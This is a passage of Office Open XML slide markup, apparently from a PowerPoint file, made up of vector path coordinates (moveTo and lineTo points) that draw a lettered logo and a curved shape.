                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201361" y="86410"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="820420" h="107314">
                  <a:moveTo>
                    <a:pt x="195701" y="37905"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="177158" y="37905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182188" y="39732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188797" y="46993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190466" y="52134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190512" y="58860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202642" y="58860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202311" y="53908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200763" y="47123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198183" y="41276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195701" y="37905"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="820420" h="107314">
                  <a:moveTo>
                    <a:pt x="275729" y="101292"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="237180" y="101292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240293" y="102984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243428" y="104359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249812" y="106366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253534" y="106885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262376" y="106885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266594" y="105983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274218" y="102442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275729" y="101292"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="820420" h="107314">
                  <a:moveTo>
                    <a:pt x="237180" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="224526" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224526" y="104788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236391" y="104788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237180" y="101292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275729" y="101292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277714" y="99782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280917" y="96241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281569" y="95497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251977" y="95497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249045" y="95182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243880" y="93919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240851" y="92814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237180" y="91190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237180" y="48075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240428" y="45572"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243925" y="43520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251481" y="40318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255203" y="39529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284129" y="39529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="283038" y="37702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="282833" y="37432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237180" y="37432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237180" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="820420" h="107314">
                  <a:moveTo>
                    <a:pt x="284129" y="39529"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="265489" y="39529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270271" y="41852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276203" y="51142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277637" y="57804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277669" y="76781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275684" y="83997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267744" y="93197"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262263" y="95497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281569" y="95497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="283917" y="92814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286308" y="88597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289872" y="78540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290752" y="72880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290752" y="66611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290278" y="57952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290270" y="57804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288823" y="50051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286473" y="43520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286413" y="43352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284129" y="39529"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="820420" h="107314">
                  <a:moveTo>
                    <a:pt x="270880" y="27465"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="257007" y="27465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252496" y="28412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244511" y="32133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240744" y="34523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237180" y="37432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="282833" y="37432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277895" y="30893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270880" y="27465"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="820420" h="107314">
                  <a:moveTo>
                    <a:pt x="360541" y="81900"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="359594" y="81900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="359594" y="98587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365572" y="101247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371436" y="103232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382985" y="105938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389481" y="106614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403444" y="106614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409218" y="105802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418782" y="102555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422955" y="100323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429470" y="95091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391015" y="95091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384767" y="93941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371481" y="89364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365617" y="86117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360541" y="81900"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="820420" h="107314">
                  <a:moveTo>
                    <a:pt x="404910" y="2683"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="397850" y="2683"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390031" y="3186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360203" y="22978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360203" y="38695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394985" y="60500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402835" y="61673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406489" y="62394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423045" y="83208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420745" y="87334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411542" y="93535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405113" y="95091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429470" y="95091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436940" y="80073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436940" y="68979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395662" y="46790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391579" y="46023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374075" y="25458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376241" y="21625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384925" y="15694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390654" y="14206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432880" y="14206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432880" y="9696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428346" y="7711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423136" y="6065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411384" y="3359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404910" y="2683"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="820420" h="107314">
                  <a:moveTo>
                    <a:pt x="432880" y="14206"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="404301" y="14206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410662" y="15266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423113" y="19527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428120" y="22211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431955" y="25458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432880" y="25458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432880" y="14206"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="820420" h="107314">
                  <a:moveTo>
                    <a:pt x="501587" y="27465"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="491436" y="27465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483612" y="28145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455480" y="58860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454850" y="67603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455506" y="76406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485855" y="105938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486104" y="105938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="494594" y="106547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="499489" y="106547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="504158" y="105938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513068" y="103502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="517421" y="102014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="521685" y="100210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="521685" y="95497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490602" y="95497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487060" y="94956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480632" y="92791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477880" y="91190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="475534" y="89025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473098" y="86838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471285" y="84141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468406" y="77142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="467730" y="73105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="467730" y="68483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523151" y="68483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523151" y="61628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522967" y="58860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="467723" y="58860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468156" y="53908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468248" y="52856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="470527" y="47895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="478579" y="39912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483970" y="37905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="516046" y="37905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514918" y="36372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509414" y="30442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="501587" y="27465"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="820420" h="107314">
                  <a:moveTo>
                    <a:pt x="521685" y="86410"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="521008" y="86410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518797" y="88372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515121" y="90378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="504745" y="94482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="499579" y="95497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="521685" y="95497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="521685" y="86410"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="820420" h="107314">
                  <a:moveTo>
                    <a:pt x="516046" y="37905"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="497504" y="37905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502512" y="39732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509121" y="46993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="510790" y="52134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="510835" y="58860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522967" y="58860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522638" y="53908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="521098" y="47123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518526" y="41276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="516046" y="37905"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="820420" h="107314">
                  <a:moveTo>
                    <a:pt x="557527" y="29833"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="544850" y="29833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544850" y="104788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557527" y="104788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557527" y="51390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560888" y="48639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="564384" y="46407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="571670" y="42957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="574954" y="42190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591812" y="42190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591812" y="40679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557527" y="40679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557527" y="29833"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="820420" h="107314">
                  <a:moveTo>
                    <a:pt x="591812" y="42190"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="583873" y="42190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587414" y="42596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="589431" y="42957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591136" y="43362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591812" y="43362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591812" y="42190"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="820420" h="107314">
                  <a:moveTo>
                    <a:pt x="588361" y="29833"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="577306" y="29833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="574670" y="30396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="566978" y="33779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562557" y="36643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557527" y="40679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591812" y="40679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591812" y="30396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591956" y="30396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="588361" y="29833"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="820420" h="107314">
                  <a:moveTo>
                    <a:pt x="610873" y="29562"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="597136" y="29562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627384" y="104788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="640106" y="104788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646322" y="89431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634173" y="89431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610873" y="29562"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="820420" h="107314">
                  <a:moveTo>
                    <a:pt x="670557" y="29562"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="657294" y="29562"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634173" y="89431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646322" y="89431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="670557" y="29562"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="820420" h="107314">
                  <a:moveTo>
                    <a:pt x="729745" y="27465"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="719595" y="27465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711783" y="28145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683657" y="58860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683031" y="67603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683687" y="76406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="714023" y="105938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="714273" y="105938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="722775" y="106547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="727670" y="106547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="732339" y="105938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="741226" y="103502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="745580" y="102014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749843" y="100210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749843" y="95497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718783" y="95497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715241" y="94956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708813" y="92791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="706038" y="91190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="703715" y="89025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="701279" y="86838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699444" y="84141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696587" y="77142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695888" y="73105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695888" y="68483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751332" y="68483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751332" y="61628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751147" y="58860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695881" y="58860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696333" y="53908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696429" y="52856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="698707" y="47895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="706737" y="39912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712151" y="37905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="744205" y="37905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743076" y="36372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737572" y="30442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="729745" y="27465"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="820420" h="107314">
                  <a:moveTo>
                    <a:pt x="749843" y="86410"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="749166" y="86410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="746978" y="88372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743279" y="90378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="732903" y="94482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="727760" y="95497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749843" y="95497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749843" y="86410"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="820420" h="107314">
                  <a:moveTo>
                    <a:pt x="744205" y="37905"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="725662" y="37905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730692" y="39732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737279" y="46993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="738948" y="52134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="738994" y="58860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751147" y="58860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750816" y="53908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="749268" y="47123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="746688" y="41276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="744205" y="37905"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="820420" h="107314">
                  <a:moveTo>
                    <a:pt x="785685" y="29833"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="773031" y="29833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="773031" y="104788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785685" y="104788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785685" y="51390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="789068" y="48639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="792565" y="46407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="799828" y="42957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="803131" y="42190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819971" y="42190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819971" y="40679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785685" y="40679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785685" y="29833"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="820420" h="107314">
                  <a:moveTo>
                    <a:pt x="819971" y="42190"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="812031" y="42190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="815595" y="42596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="817609" y="42957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819294" y="43362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819971" y="43362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819971" y="42190"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="820420" h="107314">
                  <a:moveTo>
                    <a:pt x="816520" y="29833"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="805480" y="29833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="802828" y="30396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795159" y="33779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="790715" y="36643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785685" y="40679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819971" y="40679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819971" y="30396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="820115" y="30396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="816520" y="298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5" name="object 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B671192C-C5D9-32B5-C69B-7168EEDC5151}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4834680" y="2652933"/>
              <a:ext cx="1426210" cy="911860"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1426210" h="911860">
                  <a:moveTo>
                    <a:pt x="597852" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="553817" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530106" y="3370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506396" y="10111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="496234" y="13482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484378" y="16852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431876" y="45502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389535" y="82578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382760" y="92689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="375986" y="101116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369211" y="111227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364130" y="119653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="359050" y="129765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352275" y="139877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348888" y="151674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342113" y="171897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338726" y="183694"/>
                  </a:lnTo>
                  <a:lnTo>
